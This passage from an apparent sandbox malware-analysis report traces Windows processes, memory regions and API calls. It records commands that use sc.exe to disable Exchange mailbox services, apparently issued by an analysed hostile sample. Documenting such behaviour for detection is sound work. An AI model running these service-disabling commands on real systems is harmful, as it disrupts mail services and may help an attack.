= "0x423b4000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0xf9c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7690 start_va = 0x7f8db000 end_va = 0x7f8dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f8db000" filename = "" Region: id = 7691 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7692 start_va = 0xf180c40000 end_va = 0xf180c5ffff entry_point = 0x0 region_type = private name = "private_0x000000f180c40000" filename = "" Region: id = 7693 start_va = 0xf180c60000 end_va = 0xf180c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f180c60000" filename = "" Region: id = 7694 start_va = 0xf180c80000 end_va = 0xf180cbffff entry_point = 0x0 region_type = private name = "private_0x000000f180c80000" filename = "" Region: id = 7695 start_va = 0x7df5fffb0000 end_va = 0x7ff5fffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffb0000" filename = "" Region: id = 7696 start_va = 0x7ff6c43b0000 end_va = 0x7ff6c43d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43b0000" filename = "" Region: id = 7697 start_va = 0x7ff6c43dd000 end_va = 0x7ff6c43defff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43dd000" filename = "" Region: id = 7698 start_va = 0x7ff6c43df000 end_va = 0x7ff6c43dffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43df000" filename = "" Region: id = 7699 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7700 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7701 start_va = 0xf180c40000 end_va = 0xf180c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f180c40000" filename = "" Region: id = 7702 start_va = 0xf180c50000 end_va = 0xf180c56fff entry_point = 0x0 region_type = private name = "private_0x000000f180c50000" filename = "" Region: id = 7703 start_va = 0xf180cc0000 end_va = 0xf180d7dfff entry_point = 0xf180cc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7704 start_va = 0xf180d80000 end_va = 0xf180dbffff entry_point = 0x0 region_type = private name = "private_0x000000f180d80000" filename = "" Region: id = 7705 start_va = 0xf180dc0000 end_va = 0xf180dc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f180dc0000" filename = "" Region: id = 7706 start_va = 0xf180dd0000 end_va = 0xf180dd6fff entry_point = 0x0 region_type = private name = "private_0x000000f180dd0000" filename = "" Region: id = 7707 start_va = 0xf180de0000 end_va = 0xf180de0fff entry_point = 0x0 region_type = private name = "private_0x000000f180de0000" filename = "" Region: id = 7708 start_va = 0xf180df0000 end_va = 0xf180df0fff entry_point = 0x0 region_type = private name = "private_0x000000f180df0000" filename = "" Region: id = 7709 start_va = 0xf180e20000 end_va = 0xf180f1ffff entry_point = 0x0 region_type = private name = "private_0x000000f180e20000" filename = "" Region: id = 7710 start_va = 0xf181090000 end_va = 0xf18109ffff entry_point = 0x0 region_type = private name = "private_0x000000f181090000" filename = "" Region: id = 7711 start_va = 0xf1810a0000 end_va = 0xf181227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f1810a0000" filename = "" Region: id = 7712 start_va = 0xf181230000 end_va = 0xf1813b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f181230000" filename = "" Region: id = 7713 start_va = 0xf1813c0000 end_va = 0xf1827bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f1813c0000" filename = "" Region: id = 7714 start_va = 0x7ff6c42b0000 end_va = 0x7ff6c43affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42b0000" filename = "" Region: id = 7715 start_va = 0x7ff6c43db000 end_va = 0x7ff6c43dcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43db000" filename = "" Region: id = 7716 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7717 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7718 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7719 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7720 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7721 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7722 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7723 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7724 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7725 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7726 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7727 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7728 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7729 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 482 os_tid = 0xfa0 Thread: id = 483 os_tid = 0xf88 Thread: id = 484 os_tid = 0xfc8 Process: id = "142" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x756f0000" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0xf9c" cmd_line = "sc config MSExchangeMailboxAssistants start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7743 start_va = 0x1e0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 7744 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 7745 start_va = 0x210000 end_va = 0x223fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 7746 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 7747 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 7748 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7749 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 7750 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7751 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7752 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7753 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7754 start_va = 0x7eac0000 end_va = 0x7eae2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 7755 start_va = 0x7eae9000 end_va = 0x7eae9fff entry_point = 0x0 region_type = private name = "private_0x000000007eae9000" filename = "" Region: id = 7756 start_va = 0x7eaec000 end_va = 0x7eaeefff entry_point = 0x0 region_type = private name = "private_0x000000007eaec000" filename = "" Region: id = 7757 start_va = 0x7eaef000 end_va = 0x7eaeffff entry_point = 0x0 region_type = private name = "private_0x000000007eaef000" filename = "" Region: id = 7758 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7759 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7760 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7761 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7762 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7763 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 7764 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7765 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7766 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 7767 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7768 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 7769 start_va = 0x1f0000 end_va = 0x1f3fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 7770 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 7771 start_va = 0x430000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 7772 start_va = 0x4b0000 end_va = 0x56dfff entry_point = 0x4b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7773 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 7774 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7775 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7776 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7777 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7778 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7779 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7780 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7781 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7782 start_va = 0x7e9c0000 end_va = 0x7eabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9c0000" filename = "" Region: id = 7783 start_va = 0x7eae6000 end_va = 0x7eae8fff entry_point = 0x0 region_type = private name = "private_0x000000007eae6000" filename = "" Region: id = 7784 start_va = 0x570000 end_va = 0x64efff entry_point = 0x570000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7785 start_va = 0x470000 end_va = 0x481fff entry_point = 0x470000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 486 os_tid = 0xfec [0131.245] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0131.245] __set_app_type (_Type=0x1) [0131.245] __p__fmode () returned 0x77ac4d6c [0131.245] __p__commode () returned 0x77ac5b1c [0131.245] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0131.246] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0131.246] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.248] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0131.248] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0131.248] _wcsicmp (_String1="config", _String2="query") returned -14 [0131.248] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0131.248] _wcsicmp (_String1="config", _String2="start") returned -16 [0131.248] _wcsicmp (_String1="config", _String2="pause") returned -13 [0131.248] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0131.248] _wcsicmp (_String1="config", _String2="control") returned -14 [0131.248] _wcsicmp (_String1="config", _String2="continue") returned -14 [0131.248] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.248] _wcsicmp (_String1="config", _String2="config") returned 0 [0131.248] ResolveDelayLoadedAPI () returned 0x77262c10 [0131.248] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x338848 [0131.250] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0131.250] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0131.250] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0131.250] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0131.250] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0131.250] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0131.250] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0131.250] OpenServiceW (hSCManager=0x338848, lpServiceName="MSExchangeMailboxAssistants", dwDesiredAccess=0x3) returned 0x0 [0131.251] GetLastError () returned 0x424 [0131.251] _ultow (in: _Dest=0x424, _Radix=2817032 | out: _Dest=0x424) returned="1060" [0131.251] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0131.252] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2afbe4, nSize=0x2, Arguments=0x2afbfc | out: lpBuffer="褠3ﰤ*蔔è") returned 0x62 [0131.253] GetFileType (hFile=0x3c) returned 0x2 [0131.253] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x2afbc8 | out: lpMode=0x2afbc8) returned 1 [0131.253] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x338920*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x2afbd8, lpReserved=0x0 | out: lpBuffer=0x338920*, lpNumberOfCharsWritten=0x2afbd8*=0x62) returned 1 [0131.253] LocalFree (hMem=0x338920) returned 0x0 [0131.253] LocalFree (hMem=0x0) returned 0x0 [0131.253] CloseServiceHandle (hSCObject=0x338848) returned 1 [0131.253] LocalFree (hMem=0x0) returned 0x0 [0131.253] exit (_Code=1060) Thread: id = 487 os_tid = 0xfe8 Process: id = "143" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x67a60000" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeMailboxReplication start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7786 start_va = 0x60000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7787 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7788 start_va = 0x90000 end_va = 0xa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 7789 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7790 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7791 start_va = 0x1f0000 end_va = 0x1f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 7792 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 7793 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 7794 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7795 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 7796 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7797 start_va = 0x7f900000 end_va = 0x7f922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f900000" filename = "" Region: id = 7798 start_va = 0x7f927000 end_va = 0x7f927fff entry_point = 0x0 region_type = private name = "private_0x000000007f927000" filename = "" Region: id = 7799 start_va = 0x7f92a000 end_va = 0x7f92cfff entry_point = 0x0 region_type = private name = "private_0x000000007f92a000" filename = "" Region: id = 7800 start_va = 0x7f92d000 end_va = 0x7f92dfff entry_point = 0x0 region_type = private name = "private_0x000000007f92d000" filename = "" Region: id = 7801 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7802 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7803 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7804 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7805 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7806 start_va = 0x45f0000 end_va = 0x45fffff entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 7807 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7808 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7809 start_va = 0x44e0000 end_va = 0x45dffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 7810 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7851 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7852 start_va = 0x220000 end_va = 0x2ddfff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7853 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 7854 start_va = 0x4600000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 7855 start_va = 0x4870000 end_va = 0x487ffff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 7856 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7857 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7858 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7859 start_va = 0x7f800000 end_va = 0x7f8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f800000" filename = "" Region: id = 7860 start_va = 0x7f924000 end_va = 0x7f926fff entry_point = 0x0 region_type = private name = "private_0x000000007f924000" filename = "" Region: id = 7861 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7862 start_va = 0x80000 end_va = 0x83fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7863 start_va = 0x4880000 end_va = 0x4bb6fff entry_point = 0x4880000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 488 os_tid = 0xfe4 [0131.448] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0131.448] __set_app_type (_Type=0x1) [0131.448] __p__fmode () returned 0x77ac4d6c [0131.448] __p__commode () returned 0x77ac5b1c [0131.448] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0131.448] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0131.449] GetCurrentThreadId () returned 0xfe4 [0131.449] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfe4) returned 0x84 [0131.449] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.449] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0131.449] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.451] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.451] 